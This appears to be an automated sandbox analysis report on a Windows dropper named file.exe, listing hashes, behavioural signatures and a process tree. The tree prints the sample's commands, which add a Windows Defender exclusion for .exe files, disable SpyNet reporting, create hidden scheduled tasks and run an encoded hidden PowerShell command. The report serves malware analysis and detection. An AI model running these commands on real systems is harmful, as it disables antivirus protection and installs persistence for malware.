Analysis
-
max time kernel
152s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
11/10/2022, 08:02
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
c3ea7a9142acb253b47927829730b1d1
-
SHA1
0c81ce34ba68e0e4cb4cce5288b0203962497d7f
-
SHA256
3d74ef58c00334e3ec44b26fabbf548c1879d4fcb3264c3fedd83129384f58d5
-
SHA512
5f3af0b2deaeebd7f9e5306a7314160b37b1ac4ab01c1cd30466ee7c3154f09001f916787ee297464125bd975552ad230cce6f773db14480ffd52a9e7c9441f7
-
SSDEEP
196608:91Oqi714jmB48iWcpfES/HkRj+1O6UUBiGp:3OWjmB4xZpTEN+w8iGp
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
pid Process 4560 Install.exe 5068 Install.exe 1020 OfKyjXa.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Install.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\bOXfKGvclsQzhTGUxV.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 260 schtasks.exe 3460 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3372 powershell.EXE 3372 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3372 powershell.EXE -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 1984 wrote to memory of 4560 1984 file.exe 82 PID 1984 wrote to memory of 4560 1984 file.exe 82 PID 1984 wrote to memory of 4560 1984 file.exe 82 PID 4560 wrote to memory of 5068 4560 Install.exe 85 PID 4560 wrote to memory of 5068 4560 Install.exe 85 PID 4560 wrote to memory of 5068 4560 Install.exe 85 PID 5068 wrote to memory of 2040 5068 Install.exe 86 PID 5068 wrote to memory of 2040 5068 Install.exe 86 PID 5068 wrote to memory of 2040 5068 Install.exe 86 PID 5068 wrote to memory of 432 5068 Install.exe 88 PID 5068 wrote to memory of 432 5068 Install.exe 88 PID 5068 wrote to memory of 432 5068 Install.exe 88 PID 2040 wrote to memory of 1372 2040 forfiles.exe 90 PID 2040 wrote to memory of 1372 2040 forfiles.exe 90 PID 2040 wrote to memory of 1372 2040 forfiles.exe 90 PID 432 wrote to memory of 1604 432 forfiles.exe 91 PID 432 wrote to memory of 1604 432 forfiles.exe 91 PID 432 wrote to memory of 1604 432 forfiles.exe 91 PID 1372 wrote to memory of 2808 1372 cmd.exe 92 PID 1372 wrote to memory of 2808 1372 cmd.exe 92 PID 1372 wrote to memory of 2808 1372 cmd.exe 92 PID 1604 wrote to memory of 3792 1604 cmd.exe 93 PID 1604 wrote to memory of 3792 1604 cmd.exe 93 PID 1604 wrote to memory of 3792 1604 cmd.exe 93 PID 5068 wrote to memory of 260 5068 Install.exe 94 PID 5068 wrote to memory of 260 5068 Install.exe 94 PID 5068 wrote to memory of 260 5068 Install.exe 94 PID 1604 wrote to memory of 204 1604 cmd.exe 95 PID 1604 wrote to memory of 204 1604 cmd.exe 95 PID 1604 wrote to memory of 204 1604 cmd.exe 95 PID 1372 wrote to memory of 2188 1372 cmd.exe 97 PID 1372 wrote to memory of 2188 1372 cmd.exe 97 PID 1372 wrote to memory of 2188 1372 cmd.exe 97 PID 5068 wrote to memory of 5004 5068 Install.exe 98 PID 5068 wrote to memory of 5004 5068 Install.exe 98 PID 5068 wrote to memory of 5004 5068 Install.exe 98 PID 5068 wrote to memory of 384 5068 Install.exe 105 PID 5068 wrote to memory of 384 5068 Install.exe 105 PID 5068 wrote to memory of 384 5068 Install.exe 105 PID 5068 wrote to memory of 3460 5068 Install.exe 107 PID 5068 wrote to memory of 3460 5068 Install.exe 107 PID 5068 wrote to memory of 3460 5068 Install.exe 107 PID 3372 wrote to memory of 2552 3372 powershell.EXE 109 PID 3372 wrote to memory of 2552 3372 powershell.EXE 109
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Users\Admin\AppData\Local\Temp\7zSE208.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Users\Admin\AppData\Local\Temp\7zSE777.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1372 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2808
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2188
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3792
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:204
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfhJHzRwa" /SC once /ST 08:32:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:260
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfhJHzRwa"4⤵PID:5004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfhJHzRwa"4⤵PID:384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOXfKGvclsQzhTGUxV" /SC once /ST 10:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uHdWtyjWXpcRVswOS\JnNNyRyrhukZDqT\OfKyjXa.exe\" SH /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3460
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2552
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2088
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\uHdWtyjWXpcRVswOS\JnNNyRyrhukZDqT\OfKyjXa.exeC:\Users\Admin\AppData\Local\Temp\uHdWtyjWXpcRVswOS\JnNNyRyrhukZDqT\OfKyjXa.exe SH /site_id 525403 /S1⤵
- Executes dropped EXE
PID:1020
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD5381febc6d65a8b386a3f4e9a9eddb1c0
SHA10e43ce2bcf687ecf36602a0a1a9e53e02ad6d00f
SHA256a9c9b87faa0d0914ff4ee1fff23503acdec70db41f52a5063ad3d4c02c199245
SHA512c0fd4bf574eed10c7505b2e8698257d2228bb6a0d70a6f6b32f2d54154ea3acb32c80c144e0bdf0fa7607eaa7fe8ccb51b7ff278cd19f5b4c520dd0d6c841436
-
Filesize
6.3MB
MD5381febc6d65a8b386a3f4e9a9eddb1c0
SHA10e43ce2bcf687ecf36602a0a1a9e53e02ad6d00f
SHA256a9c9b87faa0d0914ff4ee1fff23503acdec70db41f52a5063ad3d4c02c199245
SHA512c0fd4bf574eed10c7505b2e8698257d2228bb6a0d70a6f6b32f2d54154ea3acb32c80c144e0bdf0fa7607eaa7fe8ccb51b7ff278cd19f5b4c520dd0d6c841436
-
Filesize
6.8MB
MD5e87bebebe4c9da8baa94b80c4ea4f588
SHA1b70a14e02dee3e932419c3c4c35fd634807da3b4
SHA25672c185e62a77b8df8cdd77629cb4bc8677d3057334e0dd8f402668e295f713f9
SHA512e027f6dfc48f021b64e5eb9ba678283b6c7e6a4e99ff3252b9c3dac5f56186c79b37da02604e124dfc48dd6e2bd88dc5e36c4e83c451b3477c7ec9d8b271e6c6
-
Filesize
6.8MB
MD5e87bebebe4c9da8baa94b80c4ea4f588
SHA1b70a14e02dee3e932419c3c4c35fd634807da3b4
SHA25672c185e62a77b8df8cdd77629cb4bc8677d3057334e0dd8f402668e295f713f9
SHA512e027f6dfc48f021b64e5eb9ba678283b6c7e6a4e99ff3252b9c3dac5f56186c79b37da02604e124dfc48dd6e2bd88dc5e36c4e83c451b3477c7ec9d8b271e6c6
-
Filesize
6.8MB
MD5e87bebebe4c9da8baa94b80c4ea4f588
SHA1b70a14e02dee3e932419c3c4c35fd634807da3b4
SHA25672c185e62a77b8df8cdd77629cb4bc8677d3057334e0dd8f402668e295f713f9
SHA512e027f6dfc48f021b64e5eb9ba678283b6c7e6a4e99ff3252b9c3dac5f56186c79b37da02604e124dfc48dd6e2bd88dc5e36c4e83c451b3477c7ec9d8b271e6c6
-
Filesize
6.8MB
MD5e87bebebe4c9da8baa94b80c4ea4f588
SHA1b70a14e02dee3e932419c3c4c35fd634807da3b4
SHA25672c185e62a77b8df8cdd77629cb4bc8677d3057334e0dd8f402668e295f713f9
SHA512e027f6dfc48f021b64e5eb9ba678283b6c7e6a4e99ff3252b9c3dac5f56186c79b37da02604e124dfc48dd6e2bd88dc5e36c4e83c451b3477c7ec9d8b271e6c6